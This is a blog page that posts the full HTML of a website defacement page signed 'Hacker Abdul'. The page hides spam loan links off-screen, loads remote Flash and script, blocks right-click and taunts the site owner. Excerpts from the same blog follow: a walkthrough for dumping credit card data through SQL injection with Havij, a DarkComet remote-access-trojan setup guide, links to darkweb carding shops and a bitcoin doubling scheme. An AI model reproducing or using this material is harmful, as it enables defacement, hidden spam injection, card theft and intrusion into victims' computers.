Skip to main content

Abdul hacker deface page

Abdul hacker deface page
    <EMBED src="http://greencall.co.kr/.p/we_will_not_go_down.swf" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1">
    <html>
        <body onload="scrlsts()"><script type="text/javascript">
document.write('<' + 'di' + 'v sty' + 'le="position: absolute; l' + 'eft: -1946px; t' + 'op' + ': -2856px;" class="sufoxyyhvnyswxs15">');
</script>

<a href="http://cergyd7.dev2.cmantika.com/includes/index.php">installment loans california bad credit</a>
<a href="http://www.diamondwares.net/logs/index.php">online cash loan direct lenders</a>
<a href="http://armastroy.com/templates/index.php">easy loan kota kinabalu</a>
<a href="http://www.magazinecambodia.com/templates/index.php">check advance loan online</a>
<a href="http://devriespiping.nl/misc/index.php">instant</a>
<a href="http://www.vannini.altervista.org/cache/index.php">online title</a>
<a href="http://caramelmoda.com/data/index.php">get a</a>
<a href="http://rppatel.com/includes/index.php">customer service united cash loan.com</a>

<script type="text/javascript">document.write('</d' + 'iv>');</script>

        
        <br>
        
        <br>
      
        <SCRIPT LANGUAGE="JavaScript">
        
        var scrl = "--==Hacked by Hacker Abdul===--";
        
        function scrlsts() {
        
         scrl = scrl.substring(1, scrl.length) + scrl.substring(0, 1);
        
         document.title = scrl;
        
         setTimeout("scrlsts()", 300);
        
         }
        
        
        
        </script>
        
        
        
        <style type='text/css'>
        
        font.glow {text-shadow: 0 0 0.2em #8F7}
        
        font.wglow {text-shadow: 0 0 0.2em #6F6}
        
        font.whiteglow {text-shadow: 0 0 0.2em #FFF}
        
        font.redglow {text-shadow: 0 0 0.2em #F00}
        
        font.blueglow {text-shadow: 0 0 0.2em #00F}
        
        font.greenglow {text-shadow: 0 0 0.2em #0F0}
        
        button.evil
        
        {
        
           text-shadow: -1px 0 black, 0 1px black, 1px 0 black, 0 -1px black;
        
           font-size:14px;
        
           font-family:Tahoma,sans-serif;
        
           font-weight:bold;
        
           width:140px;
        
        }
          <style>
    .name { text-decoration: none;}
    @-moz-keyframes roll { 100% { -moz-transform: rotate(360deg); } }
    @-o-keyframes roll { 100% { -o-transform: rotate(360deg); } }
    @-webkit-keyframes roll { 100% { -webkit-transform: rotate(360deg); } }
    body{-moz-animation-name: roll;
    -moz-animation-duration: 4s;
    -moz-animation-iteration-count: 2;
    -o-animation-name: roll;
    -o-animation-duration: 4s;
    -o-animation-iteration-count: 2;
    -webkit-animation-name: roll;
    -webkit-animation-duration: 4s;
    -webkit-animation-iteration-count: 2;}</style>
      
        
      
        
               
        
     
        
        
        </style>
        
        
        
        </style>
        
        
        
         <LINK rel="SHORTCUT ICON" href="http://defaced.com.nu/dir/images/zombie-icon.gif">
        
        <script language="Javascript1.2">
        
        var mymessage = "YOU BLOODY IDIOT! DONT TRY TO COPY MY CODE ;-)";
        
        
        
        function rtclickcheck(keyp){
        
          if (navigator.appName == "Netscape" && keyp.which == 3) {
        
            alert(mymessage);
        
            return false;
        
          }
        
        
        
          if (navigator.appVersion.indexOf("MSIE") != -1 && event.button == 2) {
        
            alert(mymessage);
        
            return false;
        
          }
        
        }
        
        
        
        document.onmousedown = rtclickcheck
        
        //-->
        
        </script>
        
        <script type='text/javascript' src='http://defaced.com.nu/dir/javascript/TypingText.js'></script>
        
        
        
        <head>
        
        <style>
        
        .shakeimage{
        
        position:relative
        
        }
        
        
        
        
        
        </style>
        
        <script language="JavaScript1.2">
        
        
        
        
        
        var rector=3
        
        
        
        ///////DONE EDITTING///////////
        
        var stopit=0
        
        var a=1
        
        
        
        function init(which){
        
        stopit=0
        
        shake=which
        
        shake.style.left=0
        
        shake.style.top=0
        
        }
        
        
        
        function rattleimage(){
        
        if ((!document.all&&!document.getElementById)||stopit==1)
        
        return
        
        if (a==1){
        
        shake.style.top=parseInt(shake.style.top)+rector+"px"
        
        }
        
        else if (a==2){
        
        shake.style.left=parseInt(shake.style.left)+rector+"px"
        
        }
        
        else if (a==3){
        
        shake.style.top=parseInt(shake.style.top)-rector+"px"
        
        }
        
        else{
        
        shake.style.left=parseInt(shake.style.left)-rector+"px"
        
        }
        
        if (a<4)
        
        a++
        
        else
        
        a=1
        
        setTimeout("rattleimage()",10)
        
        }
        
        
        
        function stoprattle(which){
        
        stopit=1
        
        which.style.left=0
        
        which.style.top=0
        
        }
        
        </script>
        
        <body background="http://www.madtomatoe.com/wp-content/uploads/2010/11/matrix-animated-image.gif">
        
        </head>
        
        
        
        <table bgcolor='#000000' align='center' class="code notranslate" width="90%" height="5%" border="5" cellpadding="0" cellspacing="0">
        
        <tbody>
        
        <tr><td>
        
        <center><img src="http://a4.sphotos.ak.fbcdn.net/hphotos-ak-ash3/s720x720/527667_172821372837857_100003299855088_254508_88873207_n.jpg"</center>
        
        </td></tr>
        
        </tbody>
        
        </table>
        
        
        
        <table background="https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcRT8YjmtmPBlM9YnFZm4PDttYo7GwZjamJsME6KzC2VHN0lpRuNZhpFPXww" align='center' class="code notranslate" width="0%" border="5" cellpadding="0" cellspacing="0">
        
        
        
        <tbody>
        
        
        
                <tr><td>
        
        
        
                <center>
        
                <br>
        
                <b><font class='wglow' face='courier new' class='wglow' size="5">HACKED BY Hacker Abdul</font></b>
        
                <br>
        
                <br>
        
                      
        
                        <script type="text/javascript">
        
        new TypingText(document.getElementById("line1"));
        
        new TypingText(document.getElementById("line2"));
        
        new TypingText(document.getElementById("line3"));
        
        new TypingText(document.getElementById("line4"));
        
        new TypingText(document.getElementById("line5"));
        
        new TypingText(document.getElementById("line6"));
        
        new TypingText(document.getElementById("line7"));
        
        new TypingText(document.getElementById("line8"));
        
        TypingText.runAll();
        
        
        
        </script>
        
        
        
                <br>
        
        
        
                <br>
        
                </tr></td>
        
                <!--END ROW 1-->
        
        
        
                <!--ROW 2-->
        
                <tr><td>
        
        </center>
        
        <br>
        
        <center>
        
        
        
        <font class='wglow' size='5' face='courier new'><b>You Were Owned by:<br>-====ANONYMOUS INDIA====-</b></font>
        
        
        
        <br>
        
        <br>
        
        </center>
        
        </tr></td>
        
        </tbody></table>
        
        <table bgcolor='#000000' align='center' class="code notranslate" width="90%" height="5%" border="5" cellpadding="0" cellspacing="0">
        
        <tbody>
        
        <tr><td>
        
        <marquee><font class="glow"><font color='#00ff00' face='tahoma'><b>Your website has been hacked by Hacker Abdul. Don't Mess With Us.</b></font></font></marquee>
        
        
        </td></tr>
        
        </tbody></table>
        
        
        
        <table bgcolor='#000000' align='center' class="code notranslate" width="90%" border="5" cellpadding="0" cellspacing="0" bgcolor='#000000'>
        
        <tbody>
        
        
        
        <!--ROW 1-->
        
                <tr><td>
        
        
        <center>
        
        <br><br>
        
        <br><br>
        <marquee>
        
        <font class='whiteglow' face='tahoma'> | </font>
        
        <font face='tahoma' color='red' class='wglow'>15 Years Innocent Girl Felani Killed by Fucking Indian Border Security Force (BSF).DID THEY DESERVE THAT ?
    CAN U CONDOLE THIS VANDALISM</font>
        
        <font class='whiteglow' face='tahoma'> | </font>
        
        <font class='whiteglow' face='tahoma'> | </font>
        
        <font face='tahoma' color='white' class='wglow'>NO FREEDOM - NO INTERNET - SAY NO TO ACTA #OP FREE CYPRUS</font>
        
        <font class='whiteglow' face='tahoma'> | </font>
        
        </marquee>
        
        
        
        <br>
        
        </tr></td>
        
        <!--END ROW 3-->
        
        <!--end table-->
        
        </tr></td>
        
        
        
        </tbody></table>
        
        
        
        </tbody></table>
        
        
        
        <table bgcolor='#000000' align='center' class="code notranslate" width="90%" height="30%" border="5" cellpadding="0" cellspacing="0">
        
        <tbody>
        
        <tr height='20%'>
        
        <td width='50%'>
        
        <center>
        
        <font face='tahoma' class='wglow'><b> l| </b></font>
        
        
        
        <button class='evil' onclick="meow()"><b><font color='#009900'>DONT FORGET</font></b></button>
        
        <font face='tahoma' class='wglow'><b> l|l </b></font>
        
        <button class='evil' onclick="box()"><b><font color='#009900'>Hacker Abdul WAS HERE</font></b></button>
        
        <font face='tahoma' class='wglow'><b> |l </b></font>
        
        </center>
        
        </td>
        
        </tr>
        
        <tr height='40%'><td width='100%'>
        
        <b>
        
        <center><font face= 'tahoma' class='wglow' color='white'>Greetz To:</font><center>
        
        
        <marquee>
        
        <font class='whiteglow' face='tahoma'> | </font>
        
        <font face='tahoma' color='red' class='wglow'>BD SHELL  - Rotating Rotor - Crack Brain - Macho Ayie (Macho Cybercrime) - Stalin Dark - P5YCH0D3V1L</font>
        
        <font class='whiteglow' face='tahoma'> || </font>
        
        <font face='tahoma' color='green' class='redglow'>HAxor Deception - DARK KNIGHT - stephen hackinG - Root codefiRe - R3D In GR33N - R3@P3r - Fir3_Tim3 - Comrade SR - K1nG H4T - silent criminaL - b|@cK haCker - ANG3L$ J@Y - 4s@k3n - r3du@n - Crystal Heart - Animus</font>
        
        <font class='whiteglow' face='tahoma'> || </font>
        
        
        
        <font face='tahoma' color='orange' class='wglow'>ALL  HACKERS!</font>
        
        <font class='whiteglow' face='tahoma'> || </font>
        
        <font face='tahoma' color='purple' class='blueglow'>ALL ANONYMOUs</font>
        
        <font class='whiteglow' face='tahoma'> || </font>
        
        <font face='tahoma' color='white' class='wglow'>And Also u Admin :)</font>
        
        <font class='whiteglow' face='tahoma'> | </font>
        
        </marquee>
        
        </b>
        
        
        
        </td></tr>
        
         <CENTER>
<CENTER><font color="00ffcc" face="COLONNA MT" size="4"> -- Contact With Me -- </font><br>
<CENTER>
<CENTER><font color="00ffcc" face="COLONNA MT" size="4"> -- ANONYMOUS -- </font><br>
<iframe src="//www.facebook.com/plugins/likebox.php?></iframe> 
  </CENTER>

        <tr height='30%'><td width='100%'>
        
        <center>
        
        <font face='tahoma' color='#000000' class='wglow'><b>Copy Rights: ANONYMOUS @2012-20** (INDIA)</b></font>
        
        </center>
        
        </td></tr>
        
        </tbody></table>
        
        
        
        
        
        
        <!--scripts-->
        
        <script type="text/javascript">
        
        
        
        function meow()
        
        {
        
        alert("Don't worry, no data has been damaged");
        
        alert("It's only been erased ;)");
        
        alert("admin, good luck getting the site back");
        
        alert(" Hacker Abdul ");
        
        }
        
        function box()
        
        {
        
        alert("Hi Admin.");
        
        alert("Dont Forget To Right Click The Site");
        
        }
        
        window.onbeforeunload = function()
        
        {
        
                alert("WE ARE Hacker Abdul!");
        
        }
        
        </script>
        
        <object width="1" height="1"><param name="movie" value="http://www.youtube.com/v/H0FoW39Zmgs&hl=en_US&rel=0&autoplay=1"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/H0FoW39Zmgs&hl=en_US&rel=0&autoplay=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="1" height="1"></embed></object>

Comments

Popular posts from this blog

200++ high pr eductinon&goverment site backline As We know how important backlinks are for rankings in Google for a blog/site and page rank which definitely is the trusted way to show how well your blog is which most advertiser look for.I have come up with top .gov & .edu website by registering where you can get backlinks easily.Sograb these backlinsk and see the magic how  your website ranks on Google with these high PR boosting .gov and .edu backlinks.A high quality backlinks worth thousands low quality backlinks, especially the one coming fromedu and .gov sites. Google loves backlinks from.edu & .gov sites and thus give your site good ranking in SERPs. An edu & .’gov backlinks is associated with an educational institute & government organization therefore considered asmost authentic and valued backlink in term of SEO because they are from non-profit source givequality information, not a spam one and since exists for long time in the field, have high ...

50 HIGH PR FORUMS AND BOOKMARKING SITES FOR BACKLINKS

50 HIGH PR FORUMS AND BOOKMARKING SITES FOR BACKLINKS http://answers.microsoft.com/en-us http://archiveoflinks.com / http://community.sitepoint.com / http://de.lirio.us / http://del.icio.us / http://dondir.com / http://filesharingtalk.com / http://forum.deviantart.com / http://forum.joomla.org / http://forums.cnet.com / http://forums.hostgator.com / http://forums.mysql.com / http://forums.searchenginewatch.com / http://simplemachines.org/community/index.php http://www.247webdirectory.com / http://www.2daydir.com / http://www.9dir.com/Submit http://www.9sites.net / http://www.9w1.net / http://www.a1webdirectory.org / http://www.abacusseo.com / http://www.abc-directory.com / http://www.abigdir.com / http://www.acewebdirectory.com / http://www.add2us.com / http://www.addbusiness.net / http://www.addlink.us / http://www.addlinkzfree.com / http://www.addsite.info / http://www.afreeurl.info / http://www.agrieducation.org / http://www.alistdirectory.com / http...

Various Forums

JuanDeLemos: 1. Kali Linux http://distrowatch.com/kali   http://www.kali.org/  http://forums.kali.org/ Kali Linux (formerly known as BackTrack) is a Debian-based distribution with a collection of security and forensics tools. It features timely security updates, support for the ARM architecture, a choice of four popular desktop environments, and seamless upgrades to newer versions. 2. Tails  http://distrowatch.com/tails  https://tails.boum.org/  https://tails.boum.org/support/index.en.html https://mailman.boum.org/listinfo/ The Amnesic Incognito Live System (Tails) is a Debian-based live CD/USB with the goal of providing complete Internet anonymity for the user. The product ships with several Internet applications, including web browser, IRC client, mail client and instant messenger, all pre-configured with security in mind and with all traffic anonymised. To achieve this, Incognito uses the Tor network to make Internet traffic very hard to trace...

Darkweb and Deepweb llinks latest 2017 Huge collection!!!!

hi guys... as u know deep web and darkweb is most dangeorus part of the internet... but without site link....what where will u surf it ... so i did some reasearch and get the collection.... hope u like it.. Gonzalo Nuñez: 1. Xillia (was legit back in the day on markets) http://cjgxp5lockl6aoyg.onion 2. http://cjgxp5lockl6aoyg.onion/worldwide-cardable-sites-by-alex 3. http://cjgxp5lockl6aoyg.onion/selling-paypal-accounts-with-balance-upto-5000dollars 4. http://cjgxp5lockl6aoyg.onion/cloned-credit-cards-free-shipping 5. 6. ——————————————————————————————- 7. 8. 9. UNSORTED 10. 11. Amberoad http://amberoadychffmyw.onion 12. KognitionsKyrkan http://wd43uqrbjwe6hpre.onion 13. Malina http://malina2ihfyawiau.onion 14. BB Compendium http://jq.26zp5ygkpszripvv.onion 15. Hackbb pages index (cauti...

Tor Darkweb Link

Tor link max telegram big acker: https://cardedlxzxsphu5y.onion/ SHOP FOR BUYING CARDED PRODUCTS https://2or24opd2hkebadv.onion/index.php  TORBAY FORUM chickencaptain: http://kpynyvym6xqi7wz2.onion/ parazite files and links max telegram big acker: https://kr5hou2zh4qtebqk.onion.cab/ezines/ ARCHIEVE OF SOME VINTAGE AS WELL AS NEW STUFFS https://superkuhbitj6tul.onion/library/ LIBRARY OF BOOKS ON VARIOUS TOPICS https://yuxv6qujajqvmypv.onion/ GUIDE ON USING AN SECURE OPERATING SYSTEM https://bpo4ybbs2apk4sk4.onion/en A COLLECTION OF TOOLS RELATED TO SECURITY P4RN3R: https://ondemand5xot4hdw.onion/  Tor On Demand max telegram big acker: https://f3mnl42ax3qtu3a7.onion/ GOVT LEAKS https://kzspryu63qbjfncp.onion/  DIGITAL PAWN SHOP https://yniir5c6cmuwslfl.onion/ STRANGE WEBSITE, CANT DESCRIBE https://vrimutd6so6a565x.onion.cab/index.php/Board ANONYMOUS POSTING https://h2am5w5ufhvdifrs.onion/ CRYPTOME ARCHIVE OF GOV CONSPIRACY FILES https://torc5bhzq6xorhb4.o...

how to hack cc from any website

how to hack cc from any website THINGS REQUIRED TO HACK CC INFO 1) HAVIJ PRO CLICK 2) SQLI DUMPER 3) DORKS 4) VULNERABLE SITES How to find vulnerable sites? To find vulnerable sites, you need to use the SQLi-DB and the carding dorks. Copy one of the dorks and paste it in SQLi-DB Set up the setting and click on the "scan" button Once you the scanning starts, the result will be shown in the textboxt as below CLICk on Vulnerable to filter the result and only show the vulnerable results Exploiting and dumping data Now, you need to run Havij as administrator and follow the steps below     1)Paste the vulnerable site in the  target TextBox on Havij and click Analyze     2)Click on Tables>Get Tables and you will see all the tables that are in the database     3)Now, look for a table named "Orders" or something similar. Tick the table and click on Get Columns    4)You will get the columns that are in the table "Or...

Darkcomet(Powerful RAT)Setup for Hacking

Darkcomet Out of Lan Hie Today we will talk about R.A.T windows PC using NGROK ============================================ Dedicated to my indian friends Hacking windows PC Many friends has requested me to make this tutorial :) so today we are here .. Most welcome to Hexking,  jama7 , R00t Destroyer , gaurav , Red Hex , Dreagon Dreagon , vampire kid and all the supporters of lulzsec india Lets start ... =========================================== For this you need 1) Ngrok (for forwading) 2) DarkComet (RAT) 3) Victim ( in india we call it as bakra ) 4) Brain.exe --------------------------------------------------------------------------- So for this Tutorial we are using DarkCometRAT531  Original you can download it from google no link will b provided Now we need to run ngrok ( IF YOU DON'T KNOW ABOUT NGROK GO TO MY BLOG AND SEE THE FIRST POST ) shown in below images : NGROK you need to open DarkComet there you will find Socket/NET it will b in last tab...

open a new bitcoin account and made double money

open a new bitcoin account and made double money MenuAbout UsContact Us Privacy Policy Disclaimer Sitemap  Main MenuBlogging tipsBlog designing  Blog traffic How TosMake Money Online  How to open a bitcoin account, earn, double your earnings and withdraw your money to physical cash. Bloggers Prof 11:12:00 AM  4 I recently discovered that people are now interested in bitcoin because of its high rate of popularity now in telegram, but nevertheless, I would be talking today on  how to get money into your bitcoin wallet  and how to go about your funds, weather you would withdraw it or you sell it to someone, I talked about everything you need to know about bitcoin and how to create your wallet, create your wallet let's move to today's deal. There are many ways to get  money into your wallet,   you can buy and you can also earn it , I want to show you list of sites you can earn bits from fast, Afte...

Blogs on Computer Security:

Blogs on Computer Security: https://antelox.blogspot.com / http://www.dumpanalysis.org/blog / http://www.abuse.ch / http://zairon.wordpress.com / http://androguard.blogspot.com / http://blog.w4kfu.com / http://akhenath0n.blogspot.com / http://diarrlf.wordpress.com / http://deobfuscated.blogspot.com / http://www.h-i-r.net / http://mysterie.fr/blog / http://www.skullsecurity.org/blog / http://www.wrgross.com/blogs/security / http://net-effects.blogspot.com / http://eiploader.wordpress.com / http://cyb3rsleuth.blogspot.com / http://0entropy.blogspot.com / http://siri-urz.blogspot.com / http://newsoft-tech.blogspot.com / http://www.ragestorm.net/blogs / http://codeexploration.blogspot.com / http://esploit.blogspot.com / http://thexploit.com / http://mysterie.fr/blog / http://bailey.st/blog / http://touchmymalware.blogspot.ru / http://blog.delroth.net / http://novahackers.blogspot.com / http://greatis.com/blog / http://mcdermottcybersecurity.com / http://grand...